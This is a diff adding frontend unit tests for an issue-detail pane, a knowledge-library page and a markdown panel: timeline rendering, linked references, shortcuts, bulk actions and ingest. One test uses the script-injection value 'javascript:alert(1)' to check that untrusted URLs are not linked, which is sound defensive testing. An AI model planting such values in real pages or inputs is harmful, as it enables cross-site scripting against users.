+        ev({ kind: 'labeled', label: { name: 'bug', color: 'ff0000' } }),
+        ev({ kind: 'unlabeled', label: { name: 'needs-info', color: '' } }),
+        ev({ kind: 'assigned', actor: 'alice', assignee: 'bob' }),
+        ev({ kind: 'assigned', actor: 'carol', assignee: 'carol' }),
+        ev({ kind: 'unassigned', assignee: 'bob' }),
+        ev({ kind: 'reopened' }),
+        ev({ kind: 'renamed', rename: { from: 'Old title', to: 'New title' } }),
+        ev({ kind: 'milestoned', milestone: 'v2.0' }),
+        ev({ kind: 'demilestoned', milestone: 'v2.0' }),
+        ev({ kind: 'committed', actor: null }),
+      ],
+    }))
+    const { main } = renderPane()
+    await waitFor(() => expect(within(main()).getByText('reopened this')).toBeTruthy())
+
+    // Each sentence is assembled from sibling text nodes and inline chips, so
+    // the rail's own text is the addressable unit.
+    const rail = main().textContent ?? ''
+    expect(rail).toContain('added the')
+    expect(rail).toContain('removed the')
+    expect(rail).toContain('assigned')
+    // A self-assign reads as such rather than "carol assigned carol".
+    expect(rail).toContain('self-assigned this')
+    expect(rail).toContain('unassigned')
+    expect(rail).toContain('changed the title')
+    expect(rail).toContain('Old title')
+    expect(rail).toContain('New title')
+    expect(rail).toContain('added this to the')
+    expect(rail).toContain('removed this from the')
+    // An unmodelled kind still renders its actor + the raw kind, not a blank row.
+    expect(rail).toContain('committed')
+    // …and a null actor reads as "someone" rather than "null".
+    expect(rail).toContain('someone')
+    // An unlabeled event with no colour of its own falls back to the repo map.
+    expect(within(main()).getByText('needs-info')).toBeTruthy()
+  })
+
+  it('links the closing commit and distinguishes the two close reasons', async () => {
+    api.issueDetail.mockResolvedValue(response({
+      timeline: [
+        ev({ kind: 'closed', state_reason: 'completed', commit_id: 'abcdef1234567890' }),
+        ev({ kind: 'closed', state_reason: 'not_planned' }),
+        ev({ kind: 'referenced', commit_id: 'fedcba0987654321' }),
+        ev({ kind: 'referenced', commit_id: null }),
+      ],
+    }))
+    const { main } = renderPane()
+    await waitFor(() => expect(
+      within(main()).getByRole('link', { name: 'abcdef1' }),
+    ).toBeTruthy())
+
+    const m = main()
+    const rail = m.textContent ?? ''
+    // The two close reasons are different triage answers, not one.
+    expect(rail).toContain('as completed')
+    expect(rail).toContain('as not planned')
+    expect(rail).toContain('closed this')
+    expect(within(m).getByRole('link', { name: 'abcdef1' }).getAttribute('href'))
+      .toBe('https://github.com/kirodotdev/Kiro/commit/abcdef1234567890')
+    expect(within(m).getByRole('link', { name: 'fedcba0' }).getAttribute('href'))
+      .toBe('https://github.com/kirodotdev/Kiro/commit/fedcba0987654321')
+    // A commit-less `referenced` still names the event; only the link is dropped.
+    expect(rail).toContain('referenced this in commit')
+    expect(within(m).getAllByRole('link').length).toBe(2)
+  })
+})
+
+describe('IssueDetail — linked pull requests and issues', () => {
+  const crossRefs = [
+    ev({
+      kind: 'cross-referenced', actor: 'bob', created_at: '2026-07-05T00:00:00Z',
+      source: {
+        number: 42, title: 'Fixes the thing', state: 'open', is_pr: true,
+        url: 'https://github.com/kirodotdev/Kiro/pull/42',
+      },
+    }),
+    // A duplicate of the same target — deduped by URL.
+    ev({
+      kind: 'cross-referenced', actor: 'carol', created_at: '2026-07-06T00:00:00Z',
+      source: {
+        number: 42, title: 'Fixes the thing', state: 'open', is_pr: true,
+        url: 'https://github.com/kirodotdev/Kiro/pull/42',
+      },
+    }),
+    // A FOREIGN repo, and a closed one with no title of its own.
+    ev({
+      kind: 'cross-referenced', actor: null, created_at: '2026-07-07T00:00:00Z',
+      source: {
+        number: 9, title: '', state: 'closed', is_pr: false,
+        url: 'https://github.com/other/Repo/issues/9',
+      },
+    }),
+    // Unusable sources: no url, and no number.
+    ev({
+      kind: 'cross-referenced', actor: 'bob', created_at: '2026-07-08T00:00:00Z',
+      source: {
+        number: 8, title: 'no url', state: 'open', is_pr: false, url: '',
+      },
+    }),
+    ev({ kind: 'cross-referenced', actor: 'bob', created_at: '2026-07-09T00:00:00Z' }),
+  ]
+
+  it('lifts cross-references off the rail, deduped, and titles the untitled', async () => {
+    api.issueDetail.mockResolvedValue(response({ timeline: crossRefs }))
+    const { main } = renderPane()
+    await waitFor(() => expect(within(main()).getByText('Fixes the thing')).toBeTruthy())
+
+    const m = main()
+    expect(within(m).getByText(/Linked/)).toBeTruthy()
+    // Two survivors: the deduped PR and the foreign issue. Sources with no url
+    // or no source object at all contribute nothing.
+    expect(within(m).getAllByText('Fixes the thing').length).toBe(1)
+    expect(within(m).getByText('Issue #9')).toBeTruthy()
+    expect(within(m).queryByText('no url')).toBeNull()
+    // Nothing was left on the activity rail.
+    expect(within(m).getByText('No activity yet.')).toBeTruthy()
+    expect(within(m).getByText('· 2')).toBeTruthy()
+    expect(within(m).getByText('· by bob')).toBeTruthy()
+  })
+
+  it('opens a same-repo reference in-app and a foreign one on its provider', async () => {
+    const user = userEvent.setup()
+    api.issueDetail.mockResolvedValue(response({ timeline: crossRefs }))
+    const { main } = renderPane()
+    await waitFor(() => expect(within(main()).getByText('Fixes the thing')).toBeTruthy())
+
+    const own = within(main()).getByTitle('Open PR #42 here')
+    await user.click(own)
+    await waitFor(() => expect(openRef).toHaveBeenCalledTimes(1))
+    // parseRepoRef resolved it to the ACTIVE repo, so the sheet is handed the
+    // item's kind + number rather than a second repo identity.
+    expect(openRef.mock.calls[0][0]).toMatchObject({ kind: 'pull', number: 42 })
+
+    // A different repo keeps its provider link and does not hijack the pane.
+    const foreign = within(main()).getByTitle('Open issue #9 on GitHub')
+    await user.click(foreign)
+    expect(openRef).toHaveBeenCalledTimes(1)
+    expect(foreign.getAttribute('href')).toBe('https://github.com/other/Repo/issues/9')
+  })
+
+  it('leaves a modified click to the browser', async () => {
+    const user = userEvent.setup()
+    api.issueDetail.mockResolvedValue(response({ timeline: crossRefs }))
+    const { main } = renderPane()
+    await waitFor(() => expect(within(main()).getByText('Fixes the thing')).toBeTruthy())
+
+    const own = within(main()).getByTitle('Open PR #42 here')
+    await user.keyboard('[MetaLeft>]')
+    await user.click(own)
+    await user.keyboard('[/MetaLeft]')
+    expect(openRef).not.toHaveBeenCalled()
+  })
+
+  it('refuses to link an untrusted cross-reference url', async () => {
+    api.issueDetail.mockResolvedValue(response({
+      timeline: [
+        ev({
+          kind: 'cross-referenced', actor: 'bob',
+          source: {
+            number: 5, title: 'Not a web link', state: 'open', is_pr: false,
+            url: 'javascript:alert(1)',
+          },
+        }),
+      ],
+    }))
+    const { main } = renderPane()
+    await waitFor(() => expect(within(main()).getByText('Not a web link')).toBeTruthy())
+    // The row still renders; only the href is withheld.
+    const row = within(main()).getByText('Not a web link').closest('a') as HTMLElement
+    expect(row.getAttribute('href')).toBeNull()
+  })
+})
+
+describe('IssueDetail — provider vocabulary', () => {
+  it('reads a GitLab repo in merge-request terms and on its own host', async () => {
+    ctx.value = {
+      ...ctx.value,
+      active: { ...REF, provider: 'gitlab', host: 'gitlab.example.com' },
+    }
+    api.issueDetail.mockResolvedValue(response({
+      timeline: [
+        ev({
+          kind: 'cross-referenced', actor: 'bob',
+          source: {
+            number: 42, title: 'Fixes the thing', state: 'open', is_pr: true,
+            url: 'https://gitlab.example.com/kirodotdev/Kiro/-/merge_requests/42',
+          },
+        }),
+      ],
+    }))
+    const { header, main, sidebar } = renderPane()
+    await waitFor(() => expect(within(main()).getByText('Fixes the thing')).toBeTruthy())
+
+    expect(within(main()).getByText(/merge requests/)).toBeTruthy()
+    expect(within(main()).getByText('MR!42')).toBeTruthy()
+    expect(within(header()).getByRole('link', { name: '#11' }).getAttribute('title'))
+      .toBe('Open on GitLab')
+    // Author links resolve on the self-managed host, not github.com.
+    expect(within(sidebar()).getByRole('link', { name: 'dave' }).getAttribute('href'))
+      .toBe('https://gitlab.example.com/dave')
+  })
+})

--- a/website/src/test/KnowledgeIndexCoverage.test.tsx
+++ b/website/src/test/KnowledgeIndexCoverage.test.tsx
@@ -1,0 +1,488 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { render, screen, waitFor, fireEvent, act } from '@testing-library/react'
+import userEvent from '@testing-library/user-event'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
+import { MemoryRouter } from 'react-router-dom'
+import type { IngestionJob, NamespaceInfo } from '../pages/knowledge/types'
+
+/**
+ * Coverage for the KnowledgePage shell itself — the paths the source-first
+ * tests in KnowledgeListView.test.tsx leave cold: the help dialog, the keyboard
+ * handler, the bulk archive/delete mutations, the ingest mutation, the graph
+ * tab and its entity section, and the stats bar's embedding states.
+ *
+ * The three heavy children are stubbed. Each owns its own test file, and the
+ * behaviour under test here is the PAGE's contract with them: which props it
+ * hands down and what it does with the callbacks they fire. Stubbing keeps a
+ * child's internal fetches out of the assertions.
+ */
+const mockKnowledgeApi = vi.fn()
+vi.mock('../pages/knowledge/api', () => ({
+  knowledgeApi: (...args: unknown[]) => mockKnowledgeApi(...args),
+}))
+
+vi.mock('../pages/knowledge/DetailView', () => ({
+  default: ({ itemId, onBack }: { itemId: string; onBack: () => void }) => (
+    <div>
+      <span>detail:{itemId}</span>
+      <button onClick={onBack}>stub-back</button>
+    </div>
+  ),
+}))
+
+vi.mock('../pages/knowledge/KnowledgeGraph', () => ({
+  default: ({ highlightEntity, onSelectEntity }: {
+    highlightEntity: string | null
+    onSelectEntity: (name: string) => void
+  }) => (
+    <div>
+      <span>highlight:{highlightEntity ?? 'none'}</span>
+      <button onClick={() => onSelectEntity('Ledger')}>stub-graph-pick</button>
+    </div>
+  ),
+}))
+
+vi.mock('../pages/knowledge/SourcesList', () => ({
+  default: ({ onIngest, uploadNamespace, setUploadNamespace, namespaces, ingestionJobs, uploadAccept, acceptsNoExtension }: {
+    onIngest: (files: File[]) => void
+    uploadNamespace: string
+    setUploadNamespace: (v: string) => void
+    namespaces: NamespaceInfo[]
+    ingestionJobs: IngestionJob[]
+    uploadAccept?: string
+    acceptsNoExtension?: boolean
+  }) => (
+    <div>
+      <span>accept:{uploadAccept}</span>
+      <span>ns:{uploadNamespace}</span>
+      <span>nsCount:{namespaces.length}</span>
+      <span>noExt:{String(acceptsNoExtension)}</span>
+      <button onClick={() => onIngest([new File(['body'], 'notes.md', { type: 'text/markdown' })])}>stub-upload</button>
+      <button onClick={() => setUploadNamespace('work')}>stub-set-ns</button>
+      <ul>{ingestionJobs.map(j => <li key={j.name}>job:{j.name}:{j.status}</li>)}</ul>
+    </div>
+  ),
+}))
+
+const { default: KnowledgePage } = await import('../pages/knowledge/index')
+
+function makeClient() {
+  return new QueryClient({
+    defaultOptions: { queries: { retry: false }, mutations: { retry: false } },
+  })
+}
+
+let qc = makeClient()
+const Wrapper = ({ children }: { children: React.ReactNode }) => (
+  <MemoryRouter>
+    <QueryClientProvider client={qc}>{children}</QueryClientProvider>
+  </MemoryRouter>
+)
+
+type Stats = {
+  items: number
+  entities: number
+  relations: number
+  sources: number
+  embeddings?: { enabled: boolean; model?: string; available?: boolean; embedded_items?: number }
+}
+type SourceFixture = { id: string; name: string; source_type: string; uri: string; sync_status: string; item_count: number }
+
+const FLAT_ITEM = {
+  id: 'f1',
+  title: 'Quarterly ledger notes',
+  item_type: 'document',
+  status: 'active',
+  source_id: 's1',
+  content: 'flat search body',
+  created_at: '2026-01-01',
+  updated_at: '2026-01-01',
+}
+
+// Fixture knobs. Every test resets them in beforeEach, so a test only states
+// the shape it needs.
+let sourcesFixture: SourceFixture[]
+let countsFixture: Record<string, number>
+let countsTotal: number
+let filteredCountsEmpty: boolean
+let namespacesFixture: NamespaceInfo[]
+let statsFixture: Stats | undefined
+let statsPending: boolean
+let entitiesFixture: { id: string; name: string; entity_type: string; mention_count?: number }[]
+let entityItemsFixture: { id: string; title: string; item_type: string; status: string; updated_at: string }[]
+let flatTotal: number
+let itemMutationError: Error | null
+let ingestError: Error | null
+let countsCalls: string[]
+
+function defaultApi(path: string): Promise<unknown> {
+  const p = String(path)
+  if (p.startsWith('/items/')) {
+    return itemMutationError ? Promise.reject(itemMutationError) : Promise.resolve({ ok: true })
+  }
+  if (p.startsWith('/items')) {
+    return Promise.resolve({ items: [FLAT_ITEM], total: flatTotal })
+  }
+  if (p.startsWith('/source-counts')) {
+    countsCalls.push(p)
+    if (filteredCountsEmpty && p.includes('type=')) return Promise.resolve({ counts: {}, total: 0 })
+    return Promise.resolve({ counts: countsFixture, total: countsTotal })
+  }
+  if (p.startsWith('/ingest')) {
+    return ingestError ? Promise.reject(ingestError) : Promise.resolve({ job_id: 'j1' })
+  }
+  if (p.startsWith('/entities/by-name/')) return Promise.resolve(entityItemsFixture)
+  if (p.startsWith('/entities?q=')) return Promise.resolve(entitiesFixture)
+  if (p === '/sources') return Promise.resolve(sourcesFixture)
+  if (p === '/stats') {
+    // A pending promise, not `undefined`: react-query rejects an undefined
+    // payload, and "the page before /stats answers" is a loading state anyway.
+    return statsPending ? new Promise<never>(() => {}) : Promise.resolve(statsFixture)
+  }
+  if (p === '/namespaces') return Promise.resolve(namespacesFixture)
+  if (p === '/config') return Promise.resolve({ enabled: true, supported_formats: ['.md', '.txt'], accepts_no_extension: false })
+  return Promise.resolve([])
+}
+
+beforeEach(() => {
+  vi.clearAllMocks()
+  qc = makeClient()
+  sourcesFixture = [{ id: 's1', name: 'PersonalKnowledgeBase', source_type: 'local_folder', uri: '/pkb', sync_status: 'synced', item_count: 4 }]
+  countsFixture = { s1: 4 }
+  countsTotal = 4
+  filteredCountsEmpty = false
+  namespacesFixture = []
+  statsFixture = { items: 4, entities: 2, relations: 1, sources: 1, embeddings: { enabled: true, available: true, model: 'gte-small', embedded_items: 4 } }
+  entitiesFixture = [{ id: 'e1', name: 'Ledger', entity_type: 'concept', mention_count: 7 }]
+  entityItemsFixture = [{ id: 'i9', title: 'Ledger design', item_type: 'design_doc', status: 'active', updated_at: '2026-01-02' }]
+  flatTotal = 1
+  itemMutationError = null
+  ingestError = null
+  countsCalls = []
+  mockKnowledgeApi.mockImplementation((path: string) => defaultApi(path))
+})
+
+afterEach(() => {
+  qc.clear()
+})
+
+/** Flat search mode: the page owns the item list and the top-level pager. */
+async function searchFor(term: string) {
+  const input = await screen.findByPlaceholderText(/Search knowledge/i)
+  await userEvent.type(input, `${term}{Enter}`)
+  return input
+}
+
+describe('KnowledgePage — help dialog', () => {
+  it('opens the help dialog with the onboarding steps and shortcut legend', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Help/ }))
+    const dialog = await screen.findByRole('dialog')
+    expect(dialog).toHaveTextContent('Welcome to the Knowledge Library')
+    expect(dialog).toHaveTextContent('Keyboard Shortcuts')
+    // The numbered onboarding steps come from ONBOARDING.steps, one <li> each.
+    expect(dialog.querySelectorAll('li').length).toBeGreaterThanOrEqual(3)
+  })
+
+  it('closes the help dialog from its Close button', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Help/ }))
+    await screen.findByRole('dialog')
+    await userEvent.click(screen.getByRole('button', { name: 'Close' }))
+    await waitFor(() => expect(screen.queryByRole('dialog')).not.toBeInTheDocument())
+  })
+
+  it('closes the help dialog when the backdrop itself is clicked', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Help/ }))
+    const backdrop = (await screen.findByRole('dialog')).parentElement as HTMLElement
+    // Only a click on the backdrop element closes it — a click that bubbles up
+    // from the panel must not, or every interaction inside would dismiss it.
+    fireEvent.click(screen.getByRole('dialog'))
+    expect(screen.getByRole('dialog')).toBeInTheDocument()
+    fireEvent.click(backdrop)
+    await waitFor(() => expect(screen.queryByRole('dialog')).not.toBeInTheDocument())
+  })
+
+  it('Escape closes the help dialog before it clears anything else', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Help/ }))
+    await screen.findByRole('dialog')
+    fireEvent.keyDown(document.body, { key: 'Escape' })
+    await waitFor(() => expect(screen.queryByRole('dialog')).not.toBeInTheDocument())
+  })
+})
+
+describe('KnowledgePage — keyboard shortcuts', () => {
+  it('"/" focuses the search box', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    const input = await screen.findByPlaceholderText(/Search knowledge/i)
+    expect(document.activeElement).not.toBe(input)
+    fireEvent.keyDown(document.body, { key: '/' })
+    expect(document.activeElement).toBe(input)
+  })
+
+  it('Escape inside the search box blurs it instead of reaching the page handler', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    const input = await screen.findByPlaceholderText(/Search knowledge/i) as HTMLInputElement
+    input.focus()
+    expect(document.activeElement).toBe(input)
+    fireEvent.keyDown(input, { key: 'Escape' })
+    expect(document.activeElement).not.toBe(input)
+  })
+
+  it('arrow keys page the flat search results forwards and back', async () => {
+    flatTotal = 60 // 60 hits at limit=20 in search mode -> 3 pages
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await searchFor('ledger')
+    expect(await screen.findByText('Page 1 of 3')).toBeInTheDocument()
+    fireEvent.keyDown(document.body, { key: 'ArrowRight' })
+    expect(await screen.findByText('Page 2 of 3')).toBeInTheDocument()
+    fireEvent.keyDown(document.body, { key: 'ArrowLeft' })
+    expect(await screen.findByText('Page 1 of 3')).toBeInTheDocument()
+    // Past the last page there is nothing to advance to.
+    fireEvent.keyDown(document.body, { key: 'ArrowLeft' })
+    expect(await screen.findByText('Page 1 of 3')).toBeInTheDocument()
+  })
+
+  it('Escape closes an open item before it clears the selection', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await searchFor('ledger')
+    await userEvent.click(await screen.findByText('Quarterly ledger notes'))
+    expect(await screen.findByText('detail:f1')).toBeInTheDocument()
+    fireEvent.keyDown(document.body, { key: 'Escape' })
+    await waitFor(() => expect(screen.queryByText('detail:f1')).not.toBeInTheDocument())
+  })
+
+  it('Escape clears a selection once nothing is open', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await searchFor('ledger')
+    await userEvent.click(await screen.findByLabelText('Select Quarterly ledger notes'))
+    expect(await screen.findByText('1 selected')).toBeInTheDocument()
+    fireEvent.keyDown(document.body, { key: 'Escape' })
+    await waitFor(() => expect(screen.queryByText('1 selected')).not.toBeInTheDocument())
+  })
+})
+
+describe('KnowledgePage — bulk actions', () => {
+  async function selectFlatItem() {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await searchFor('ledger')
+    await userEvent.click(await screen.findByLabelText('Select Quarterly ledger notes'))
+    expect(await screen.findByText('1 selected')).toBeInTheDocument()
+  }
+
+  const mutationCalls = (method: string) =>
+    mockKnowledgeApi.mock.calls.filter(c =>
+      String(c[0]).startsWith('/items/') && (c[1] as { method?: string } | undefined)?.method === method)
+
+  it('archives the selection and drops it when the write succeeds', async () => {
+    await selectFlatItem()
+    await userEvent.click(screen.getByRole('button', { name: 'Archive' }))
+    await waitFor(() => expect(mutationCalls('PATCH')).toHaveLength(1))
+    const [path, opts] = mutationCalls('PATCH')[0] as [string, { body?: string }]
+    expect(path).toBe('/items/f1')
+    expect(String(opts.body)).toContain('archived')
+    // onSuccess calls onDone, so the bar goes away.
+    await waitFor(() => expect(screen.queryByText('1 selected')).not.toBeInTheDocument())
+  })
+
+  it('restores the list when the archive write fails', async () => {
+    await selectFlatItem()
+    itemMutationError = new Error('patch refused')
+    await userEvent.click(screen.getByRole('button', { name: 'Archive' }))
+    await waitFor(() => expect(mutationCalls('PATCH')).toHaveLength(1))
+    // onError replays the snapshot taken in onMutate, so the optimistically
+    // removed row comes back and the selection is NOT cleared.
+    expect(await screen.findByText('Quarterly ledger notes')).toBeInTheDocument()
+    expect(screen.getByText('1 selected')).toBeInTheDocument()
+  })
+
+  it('deletes the selection only after the confirm prompt is accepted', async () => {
+    const confirmSpy = vi.fn(() => true)
+    vi.stubGlobal('confirm', confirmSpy)
+    await selectFlatItem()
+    await userEvent.click(screen.getByRole('button', { name: 'Delete' }))
+    await waitFor(() => expect(mutationCalls('DELETE')).toHaveLength(1))
+    expect(mutationCalls('DELETE')[0][0]).toBe('/items/f1')
+    expect(confirmSpy).toHaveBeenCalled()
+    vi.unstubAllGlobals()
+  })
+
+  it('writes nothing when the delete prompt is dismissed', async () => {
+    vi.stubGlobal('confirm', vi.fn(() => false))
+    await selectFlatItem()
+    await userEvent.click(screen.getByRole('button', { name: 'Delete' }))
+    expect(mutationCalls('DELETE')).toHaveLength(0)
+    expect(screen.getByText('1 selected')).toBeInTheDocument()
+    vi.unstubAllGlobals()
+  })
+
+  it('copies the content of the selected items', async () => {
+    const writeText = vi.fn().mockResolvedValue(undefined)
+    Object.defineProperty(navigator, 'clipboard', { value: { writeText }, configurable: true })
+    await selectFlatItem()
+    await userEvent.click(screen.getByRole('button', { name: /Copy Content/ }))
+    await waitFor(() => expect(writeText).toHaveBeenCalledWith('flat search body'))
+    expect(await screen.findByText('Copied!')).toBeInTheDocument()
+  })
+
+  it('clears the selection from the bar', async () => {
+    await selectFlatItem()
+    await userEvent.click(screen.getByRole('button', { name: 'Clear' }))
+    await waitFor(() => expect(screen.queryByText('1 selected')).not.toBeInTheDocument())
+  })
+})
+
+describe('KnowledgePage — sources tab and ingest', () => {
+  it('hands the backend-advertised formats to the sources panel', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Sources/ }))
+    // Built from /config.supported_formats, not from the hardcoded fallback.
+    expect(await screen.findByText('accept:.md,.txt')).toBeInTheDocument()
+    expect(screen.getByText('noExt:false')).toBeInTheDocument()
+    expect(screen.getByText('ns:default')).toBeInTheDocument()
+  })
+
+  it('lets the panel change the upload namespace', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Sources/ }))
+    await userEvent.click(await screen.findByRole('button', { name: 'stub-set-ns' }))
+    expect(await screen.findByText('ns:work')).toBeInTheDocument()
+  })
+
+  it('ingests dropped files under the active namespace and reports each job', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Sources/ }))
+    await userEvent.click(await screen.findByRole('button', { name: 'stub-upload' }))
+    expect(await screen.findByText('job:notes.md:done')).toBeInTheDocument()
+    const ingest = mockKnowledgeApi.mock.calls.find(c => String(c[0]).startsWith('/ingest'))
+    expect(String(ingest?.[0])).toContain('namespace=default')
+    expect((ingest?.[1] as { method?: string })?.method).toBe('POST')
+  })
+
+  it('reports a per-file error instead of failing the whole upload', async () => {
+    ingestError = new Error('unsupported format')
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Sources/ }))
+    await userEvent.click(await screen.findByRole('button', { name: 'stub-upload' }))
+    expect(await screen.findByText('job:notes.md:error: unsupported format')).toBeInTheDocument()
+  })
+})
+
+describe('KnowledgePage — graph tab', () => {
+  it('mounts the graph lazily and shows no entity section until one is picked', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Graph View/ }))
+    expect(await screen.findByText('highlight:none')).toBeInTheDocument()
+    expect(screen.queryByText('Items mentioning:')).not.toBeInTheDocument()
+  })
+
+  it('lists the items that mention the entity selected in the graph', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Graph View/ }))
+    await userEvent.click(await screen.findByRole('button', { name: 'stub-graph-pick' }))
+    expect(await screen.findByText('Items mentioning:')).toBeInTheDocument()
+    expect(await screen.findByText('Ledger design')).toBeInTheDocument()
+    expect(mockKnowledgeApi.mock.calls.some(c => String(c[0]) === '/entities/by-name/Ledger/items')).toBe(true)
+  })
+
+  it('says so when the selected entity has no items', async () => {
+    entityItemsFixture = []
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Graph View/ }))
+    await userEvent.click(await screen.findByRole('button', { name: 'stub-graph-pick' }))
+    expect(await screen.findByText('No items found')).toBeInTheDocument()
+  })
+
+  it('clearing the entity selection removes the section', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Graph View/ }))
+    await userEvent.click(await screen.findByRole('button', { name: 'stub-graph-pick' }))
+    await screen.findByText('Items mentioning:')
+    await userEvent.click(screen.getByRole('button', { name: 'Clear entity selection' }))
+    await waitFor(() => expect(screen.queryByText('Items mentioning:')).not.toBeInTheDocument())
+  })
+
+  it('opening an entity item returns to the list tab with that item open', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await userEvent.click(await screen.findByRole('button', { name: /Graph View/ }))
+    await userEvent.click(await screen.findByRole('button', { name: 'stub-graph-pick' }))
+    await userEvent.click(await screen.findByText('Ledger design'))
+    expect(await screen.findByText('detail:i9')).toBeInTheDocument()
+    await userEvent.click(screen.getByRole('button', { name: 'stub-back' }))
+    await waitFor(() => expect(screen.queryByText('detail:i9')).not.toBeInTheDocument())
+  })
+
+  it('an autocomplete hit jumps to the graph tab focused on that entity', async () => {
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    const input = await screen.findByPlaceholderText(/Search knowledge/i)
+    await userEvent.type(input, 'led')
+    // The suggestion row carries the entity type and its mention count.
+    const hit = await screen.findByRole('button', { name: /concept Ledger 7 mentions/ })
+    await userEvent.click(hit)
+    expect(await screen.findByText('highlight:Ledger')).toBeInTheDocument()
+    expect(await screen.findByText('Items mentioning:')).toBeInTheDocument()
+  })
+})
+
+describe('KnowledgePage — empty states and stats', () => {
+  it('sends a brand new library to the Sources tab', async () => {
+    countsFixture = {}
+    countsTotal = 0
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    const onboarding = await screen.findByTestId('knowledge-onboarding')
+    expect(onboarding).toHaveTextContent('Welcome to the Knowledge Library')
+    await userEvent.click(screen.getByRole('button', { name: 'Go to Sources to upload files' }))
+    expect(await screen.findByText('accept:.md,.txt')).toBeInTheDocument()
+  })
+
+  it('a filter that matches nothing reports empty filters, not an empty library', async () => {
+    filteredCountsEmpty = true
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await screen.findByText('PersonalKnowledgeBase')
+    fireEvent.click(screen.getByRole('combobox', { name: 'Filter by type' }))
+    fireEvent.click(await screen.findByRole('option', { name: 'runbook' }))
+    // Onboarding would strand the user here: the filter bar must stay so the
+    // filter can be undone.
+    expect(await screen.findByText('No items match your filters')).toBeInTheDocument()
+    expect(screen.queryByTestId('knowledge-onboarding')).not.toBeInTheDocument()
+    expect(screen.getByRole('combobox', { name: 'Filter by type' })).toBeInTheDocument()
+  })
+
+  it('flags an embedding model that is enabled but not yet available', async () => {
+    statsFixture = { items: 4, entities: 2, relations: 1, sources: 1, embeddings: { enabled: true, available: false, model: 'gte-small' } }
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    expect(await screen.findByText(/embeddings loading/)).toBeInTheDocument()
+  })
+
+  it('shows the initializing state when embeddings are switched off', async () => {
+    statsFixture = { items: 4, entities: 2, relations: 1, sources: 1 }
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    expect(await screen.findByText(/embeddings initializing/)).toBeInTheDocument()
+  })
+
+  it('renders no stats bar until /stats answers', async () => {
+    statsFixture = undefined
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await screen.findByText('PersonalKnowledgeBase')
+    expect(screen.queryByText(/embeddings/)).not.toBeInTheDocument()
+  })
+})
+
+describe('KnowledgePage — source sync polling', () => {
+  afterEach(() => { vi.useRealTimers() })
+
+  it('refreshes items once a scanning source settles', async () => {
+    vi.useFakeTimers()
+    sourcesFixture = [{ id: 's1', name: 'PersonalKnowledgeBase', source_type: 'local_folder', uri: '/pkb', sync_status: 'syncing', item_count: 4 }]
+    render(<KnowledgePage />, { wrapper: Wrapper })
+    await act(async () => { await vi.advanceTimersByTimeAsync(50) })
+    const before = countsCalls.length
+    // The scan finishes: the 5s poll picks up the new status and the effect
+    // invalidates the item caches so the newly ingested rows appear.
+    sourcesFixture = [{ id: 's1', name: 'PersonalKnowledgeBase', source_type: 'local_folder', uri: '/pkb', sync_status: 'synced', item_count: 9 }]
+    await act(async () => { await vi.advanceTimersByTimeAsync(6000) })
+    expect(countsCalls.length).toBeGreaterThan(before)
+  })
+})

--- a/website/src/test/MarkdownPanelMoreCoverage.test.tsx
+++ b/website/src/test/MarkdownPanelMoreCoverage.test.tsx
@@ -1,0 +1,670 @@
+/**
+ * Second-wave cold-path tests for `MarkdownPanel`.
+ *
+ * `MarkdownPanel.test.tsx` covers the ⋯ menu inventory, `MarkdownPanelCoverage`
+ * covers the resolvers plus most of the panel chrome. What neither of them ever
+ * enters, and what this file aims at:
+ *
+ *   - the ⋯ menu's own artifact / knowledge entries (the header icon buttons are
+ *     a DIFFERENT component — clicking them never runs the menu's handlers),
+ *   - the menu's WAI-ARIA Escape path, which returns focus to the trigger,
+ *   - the artifact-detail fetch falling back when `api.artifact` rejects,
+ *   - the snapshot mutation's error path,
+ *   - the discard-to-disk path when the host supplies no `onRefresh`,
+ *   - the Monaco diff editor's `beforeMount` / `onMount` wiring (theme
+ *     registration, edit forwarding, and the selection → comment hand-off),
+ *   - the comment-highlight click → row flash, and the pointer miss,
+ *   - fullscreen for a CODE file, where the overlay toolbar is the only route
+ *     to preview mode and therefore to the hljs render.
+ *
+ * `Highlight` / `CSS.highlights` are stubbed BEFORE the dynamic import because
+ * MarkdownPanel captures both into module-level constants at load time. Monaco
+ * is mocked, but unlike the sibling suites this mock DRIVES the editor
+ * callbacks: the component's whole diff integration lives inside them, and a
+ * stub that renders a bare div leaves every line of it unexecuted.
+ */
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { useEffect } from 'react'
